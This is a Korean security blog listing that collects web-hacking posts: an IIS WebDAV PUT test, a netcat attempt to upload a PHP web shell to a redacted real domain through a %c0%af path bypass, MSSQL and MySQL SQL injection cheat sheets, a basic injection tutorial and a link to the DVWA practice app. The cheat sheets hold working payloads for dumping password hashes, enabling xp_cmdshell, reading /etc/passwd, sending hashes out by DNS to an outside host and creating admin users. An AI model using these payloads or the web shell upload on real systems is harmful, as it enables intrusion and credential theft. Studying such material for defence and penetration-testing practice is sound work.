'웹'에 해당되는 글 7건

IIS, Webdav 침해사고 당하는 이유중 하나

Posted by nopsled
2015.11.25 03:24

nopsled@smleeo3o:~/Documents/python/malware (=`ω´=)$ nc 192.168.0.5 80

OPTIONS / HTTP/1.1

Host: 192.168.0.5


HTTP/1.1 200 OK

Date: Tue, 24 Nov 2015 18:18:42 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

MS-Author-Via: DAV

Content-Length: 0

Accept-Ranges: none

DASL: <DAV:sql>

DAV: 1, 2

Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK

Cache-Control: private




^C

nopsled@smleeo3o:~/Documents/python/malware (=`ω´=)$ nc 192.168.0.5 80

PUT /test.html HTTP/1.1

Host: 192.168.0.5

Content-Length: 4


HTTP/1.1 100 Continue


test

HTTP/1.1 201 Created

Date: Tue, 24 Nov 2015 18:19:36 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Location: http://192.168.0.5/test.html

Content-Length: 0

Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK




Method.. 자기 서버들 확인하고 패치 합시다.😅

저작자 표시 비영리
신고

'' 카테고리의 다른 글

IIS, Webdav 침해사고 당하는 이유중 하나  (0) 2015.11.25
webdav bypass method  (0) 2015.01.06
Web Exploit Tool Kit.pdf  (2) 2014.03.18
MSSQL SQL injection cheat sheet  (0) 2014.03.13
MySQL SQL injection cheat sheet  (0) 2014.03.12
MySQL SQL Injection 기초(and, or)  (0) 2014.03.12

webdav bypass method

Posted by nopsled
2015.01.06 11:49



C:\Users\NPKI>nc www.xxxxxxx.com 80

OPTIONS / HTTP/1.1

Host: www.xxxxxxx.com 


Date: Tue, 06 Jan 2015 02:34:36 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

MS-Author-Via: DAV

Content-Length: 0

Accept-Ranges: none

DASL: <DAV:sql>

DAV: 1, 2

Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIN

D, PROPPATCH, LOCK, UNLOCK, SEARCH

Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK

Cache-Control: private 



C:\Users\NPKI>nc www.xxxxxxx.com 80

PUT /images%c0%af/test.txt HTTP/1.1

Host: www.xxxxxxx.com

Content-Type: text/xml; charset="utf-8"

Connection:close

Content-Length: 30


<?php

system($_GET['cmd']);

?>


HTTP/1.1 403 Forbidden

Content-Length: 1358

Content-Type: text/html

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Tue, 06 Jan 2015 02:45:47 GMT

Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/st

rict.dtd">

<HTML><HEAD><TITLE>이 페이지를 저장할 수 없습니다.</TITLE>

<META HTTP-EQUIV="Content-Type" Content="text/html; charset=ks_c_5601-1987">

<STYLE type="text/css">

  BODY { font: 9pt/12pt 굴림 }

  H1 { font: 13pt/15pt 굴림 }

  H2 { font: 9pt/12pt 굴림 }

  A:link { color: red }

  A:visited { color: maroon }

</STYLE>

</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>


<h1>이 페이지를 저장할 수 없습니다.</h1>

웹 사이트에 페이지를 저장하는 데 문제가 있습니다. 쓰기 권한이 허용되지 않는 디렉

터리에서 파일을 수정하거나 파일을 업로드하려고 하면 이러한 오류가 발생할 수 있습

니다.

<hr>

<p>다음을 시도하십시오.</p>

<ul>

<li>이 디렉터리에 대한 쓰기 권한을 갖고 있는 경우 웹 사이트 관리자에게 문의하십

시오.</li>

</ul>

<h2>HTTP 오류 403.3 - 거부됨: 쓰기 권한이 거부되었습니다.<br>IIS(인터넷 정보 서

비스)</h2>

<hr>

<p>기술 정보(지원 인력용)</p>

<ul>

<li><a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft 고객기술지원

부</a>로 이동하여 <b>HTTP</b>와 <b>403</b>이라는 단어로 제목을 검색하십시오.</li

>

<li>IIS 관리자(inetmgr)에서 액세스할 수 있는 <b>IIS 도움말</b>을 열어 <b>가상 디

렉터리 사용</b>, <b>기본 웹 사이트 설정 변경</b> 및 <b>사용자 지정 오류 메시지</

b> 항목을 검색하십시오.</li>

</ul>


</TD></TR></TABLE></BODY></HTML>



MOVE /images%c0%af/test.txt HTTP/1.1

Host: www.xxxxxxx.com

Connection:close

Destination: /images%c0%af/racle.asp


HTTP/1.1 403 Forbidden

Connection: close

Date: Tue, 06 Jan 2015 02:46:38 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Type: text/html

Content-Length: 44


<body><h2>HTTP/1.1 403 Forbidden</h2></body>



저작자 표시 비영리
신고

'' 카테고리의 다른 글

IIS, Webdav 침해사고 당하는 이유중 하나  (0) 2015.11.25
webdav bypass method  (0) 2015.01.06
Web Exploit Tool Kit.pdf  (2) 2014.03.18
MSSQL SQL injection cheat sheet  (0) 2014.03.13
MySQL SQL injection cheat sheet  (0) 2014.03.12
MySQL SQL Injection 기초(and, or)  (0) 2014.03.12

Web Exploit Tool Kit.pdf

Posted by nopsled
2014.03.18 01:51


WebExploitToolkit.pdf


Web exploit kit에 대한 pdf자료 입니다.

저작자 표시 비영리
신고

'' 카테고리의 다른 글

IIS, Webdav 침해사고 당하는 이유중 하나  (0) 2015.11.25
webdav bypass method  (0) 2015.01.06
Web Exploit Tool Kit.pdf  (2) 2014.03.18
MSSQL SQL injection cheat sheet  (0) 2014.03.13
MySQL SQL injection cheat sheet  (0) 2014.03.12
MySQL SQL Injection 기초(and, or)  (0) 2014.03.12

MSSQL SQL injection cheat sheet

Posted by nopsled
2014.03.13 01:06
Version SELECT @@version
Comments SELECT 1 — comment
SELECT /*comment*/1
Current User SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
List Users SELECT name FROM master..syslogins
List Password Hashes SELECT name, password FROM master..sysxlogins — priv, mssql 2000;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins — priv, mssql 2000.  Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005;
SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005
 Password Cracker MSSQL 2000 and 2005 Hashes are both SHA1-based.  phrasen|drescher can crack these.
List Privileges – current privs on a particular object in 2005, 2008
SELECT permission_name FROM master..fn_my_permissions(null, ‘DATABASE’); — current database
SELECT permission_name FROM master..fn_my_permissions(null, ‘SERVER’); — current server
SELECT permission_name FROM master..fn_my_permissions(‘master..syslogins’, ‘OBJECT’); –permissions on a table
SELECT permission_name FROM master..fn_my_permissions(‘sa’, ‘USER’);

–permissions on a user– current privs in 2005, 2008
SELECT is_srvrolemember(‘sysadmin’);
SELECT is_srvrolemember(‘dbcreator’);
SELECT is_srvrolemember(‘bulkadmin’);
SELECT is_srvrolemember(‘diskadmin’);
SELECT is_srvrolemember(‘processadmin’);
SELECT is_srvrolemember(‘serveradmin’);
SELECT is_srvrolemember(‘setupadmin’);
SELECT is_srvrolemember(‘securityadmin’);

– who has a particular priv? 2005, 2008
SELECT name FROM master..syslogins WHERE denylogin = 0;
SELECT name FROM master..syslogins WHERE hasaccess = 1;
SELECT name FROM master..syslogins WHERE isntname = 0;
SELECT name FROM master..syslogins WHERE isntgroup = 0;
SELECT name FROM master..syslogins WHERE sysadmin = 1;
SELECT name FROM master..syslogins WHERE securityadmin = 1;
SELECT name FROM master..syslogins WHERE serveradmin = 1;
SELECT name FROM master..syslogins WHERE setupadmin = 1;
SELECT name FROM master..syslogins WHERE processadmin = 1;
SELECT name FROM master..syslogins WHERE diskadmin = 1;
SELECT name FROM master..syslogins WHERE dbcreator = 1;
SELECT name FROM master..syslogins WHERE bulkadmin = 1;

List DBA Accounts SELECT is_srvrolemember(‘sysadmin’); — is your account a sysadmin?  returns 1 for true, 0 for false, NULL for invalid role.  Also try ‘bulkadmin’, ‘systemadmin’ and other values from the documentation
SELECT is_srvrolemember(‘sysadmin’, ‘sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.
SELECT name FROM master..syslogins WHERE sysadmin = ’1′ — tested on 2005
Current Database SELECT DB_NAME()
List Databases SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …
List Columns SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
List Tables SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
Find Tables From Column Name – NB: This example works only for the current database.  If you wan’t to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column for each column containing the word ‘password’
Select Nth Row SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC — gets 9th row
Select Nth Char SELECT substring(‘abcd’, 3, 1) — returns c
Bitwise AND SELECT 6 & 2 — returns 2
SELECT 6 & 1 — returns 0
ASCII Value -> Char SELECT char(0×41) — returns A
Char -> ASCII Value SELECT ascii(‘A’) – returns 65
Casting SELECT CAST(’1′ as int);
SELECT CAST(1 as char)
String Concatenation SELECT ‘A’ + ‘B’ – returns AB
If Statement IF (1=1) SELECT 1 ELSE SELECT 2 — returns 1
Case Statement SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END — returns 1
Avoiding Quotes SELECT char(65)+char(66) — returns AB
Time Delay  WAITFOR DELAY ’0:0:5′ — pause for 5 seconds
Make DNS Requests declare @host varchar(800); select @host = name FROM master..syslogins; exec(‘master..xp_getfiledetails ”\’ + @host + ‘c$boot.ini”’); — nonpriv, works on 2000declare @host varchar(800); select @host = name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) + ‘.2.pentestmonkey.net’ from sys.sql_logins; exec(‘xp_fileexist ”\’ + @host + ‘c$boot.ini”’); — priv, works on 2005– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host.  Messy but necessary.
– Also check out theDNS tunnel feature of sqlninja
Command Execution EXEC xp_cmdshell ‘net user’; — privOn MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default:
EXEC sp_configure ‘show advanced options’, 1; — priv
RECONFIGURE; — priv
EXEC sp_configure ‘xp_cmdshell’, 1; — priv
RECONFIGURE; — priv
Local File Access CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM ‘c:boot.ini’;
DROP TABLE mydata;
Hostname, IP Address SELECT HOST_NAME()
Create Users EXEC sp_addlogin ‘user’, ‘pass’; — priv
Drop Users EXEC sp_droplogin ‘user’; — priv
Make User DBA EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin; — priv
Location of DB files EXEC sp_helpdb master; –location of master.mdf
EXEC sp_helpdb pubs; –location of pubs.mdf
Default/System Databases northwind
model
msdb
pubs — not on sql server 2005
tempdb
저작자 표시 비영리
신고

'' 카테고리의 다른 글

webdav bypass method  (0) 2015.01.06
Web Exploit Tool Kit.pdf  (2) 2014.03.18
MSSQL SQL injection cheat sheet  (0) 2014.03.13
MySQL SQL injection cheat sheet  (0) 2014.03.12
MySQL SQL Injection 기초(and, or)  (0) 2014.03.12
DVWA - Damn Vulnerable Web Application  (0) 2014.03.12

MySQL SQL injection cheat sheet

Posted by nopsled
2014.03.12 21:07
Version SELECT @@version
Comments SELECT 1; #comment
SELECT /*comment*/1;
Current User SELECT user();
SELECT system_user();
List Users SELECT user FROM mysql.user; — priv
List Password Hashes SELECT host, user, password FROM mysql.user; — priv
Password Cracker John the Ripper will crack MySQL password hashes.
List Privileges SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
List DBA Accounts SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
Current Database SELECT database()
List Databases SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db — priv
List Columns SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
List Tables SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Find Tables From Column Name SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’
Select Nth Row SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
Select Nth Char SELECT substr(‘abcd’, 3, 1); # returns c
Bitwise AND SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0
ASCII Value -> Char SELECT char(65); # returns A
Char -> ASCII Value SELECT ascii(‘A’); # returns 65
Casting SELECT cast(’1′ AS unsigned integer);
SELECT cast(’123′ AS char);
String Concatenation SELECT CONCAT(‘A’,'B’); #returns AB
SELECT CONCAT(‘A’,'B’,'C’); # returns ABC
If Statement SELECT if(1=1,’foo’,'bar’); — returns ‘foo’
Case Statement SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A
Avoiding Quotes SELECT 0×414243; # returns ABC
Time Delay SELECT BENCHMARK(1000000,MD5(‘A’));
SELECT SLEEP(5); # >= 5.0.12
Make DNS Requests Impossible?
Command Execution If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar).  The .so file should contain a User Defined Function (UDF).  raptor_udf.c explains exactly how you go about this.  Remember to compile for the target architecture which may or may not be the same as your attack platform.
Local File Access …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system
Hostname, IP Address SELECT @@hostname;
Create Users CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv
Delete Users DROP USER test1; — priv
Make User DBA GRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv
Location of DB files SELECT @@datadir;
Default/System Databases

information_schema (>= mysql 5.0)
mysql

hostname

@@hostname


저작자 표시 비영리
신고

'' 카테고리의 다른 글

webdav bypass method  (0) 2015.01.06
Web Exploit Tool Kit.pdf  (2) 2014.03.18
MSSQL SQL injection cheat sheet  (0) 2014.03.13
MySQL SQL injection cheat sheet  (0) 2014.03.12
MySQL SQL Injection 기초(and, or)  (0) 2014.03.12
DVWA - Damn Vulnerable Web Application  (0) 2014.03.12

MySQL SQL Injection 기초(and, or)

Posted by nopsled
2014.03.12 16:54

http://wh1ant.kr/archives/[Hangul] False SQL injection and Advanced blind SQL injection.txt

시작하기전 위 내용에 나와있는 소스를 사용 및 수정하여 vunlerable web application을 구성하고 포스팅 하였습니다.

   

   

 AND

127.0.0.1/info.php?num=1' and '1'='1 (True)

Query : select * from users where num='1' and '1'='1'

Users테이블에서 num이 1인것 그리고 1이 1과 같다면 출력해라.

And의 경우 앞과 뒤 모두 참이어야 합니다.

   

127.0.0.1/info.php?num=1' and '1'<'1 (False)

Query : select * from users where num='1' and '1'<'1'

Users테이블에서 num이 1인것 그리고 1이 1보다 크다면 출력해라.

둘중에 하나라도 거짓이라면 출력되지 않습니다.

 

 

  



OR 

127.0.0.1/info.php?num=1' or '1'='1;

Query : select * from users where num='1' or '1'='1'

Users라는 테이블에서 num이 1인것 또는 1=1이 같다면 출력해라.

1과 1은 같기 때문에 모두 출력합니다.


127.0.0.1/info.php?num=1' or '1'>'1;

Query : select * from users where num='1' or '1'>'1'

Users라는 테이블에서 num이 1인것 또는 1이 1보다 크다면 출력해라.

1>1은 False이므로 num이 1인것만 출력되었습니다.

신고

'' 카테고리의 다른 글

webdav bypass method  (0) 2015.01.06
Web Exploit Tool Kit.pdf  (2) 2014.03.18
MSSQL SQL injection cheat sheet  (0) 2014.03.13
MySQL SQL injection cheat sheet  (0) 2014.03.12
MySQL SQL Injection 기초(and, or)  (0) 2014.03.12
DVWA - Damn Vulnerable Web Application  (0) 2014.03.12

DVWA - Damn Vulnerable Web Application

Posted by nopsled
2014.03.12 14:15

http://www.dvwa.co.uk/


웹해킹을 연습할 수 있으며, APM_SETUP혹은 APACHE와 같이 사용하시면 됩니다.

난이도는 Low, Medium, Hight이 있으며 각각 난이도에 맞는 시큐어코딩이 되어 있어 단계별로 학습하기 좋은 Vulnerable Web Application입니다.




DVWA-1.0.8.zip

md5 : ac29f9b26d4f9f821cb82b2214da463a


APM SETUP

md5 : bdcd1790e2ade2c2e5e274a30c8ffbcd

 

저작자 표시 비영리
신고

'' 카테고리의 다른 글

webdav bypass method  (0) 2015.01.06
Web Exploit Tool Kit.pdf  (2) 2014.03.18
MSSQL SQL injection cheat sheet  (0) 2014.03.13
MySQL SQL injection cheat sheet  (0) 2014.03.12
MySQL SQL Injection 기초(and, or)  (0) 2014.03.12
DVWA - Damn Vulnerable Web Application  (0) 2014.03.12

티스토리 툴바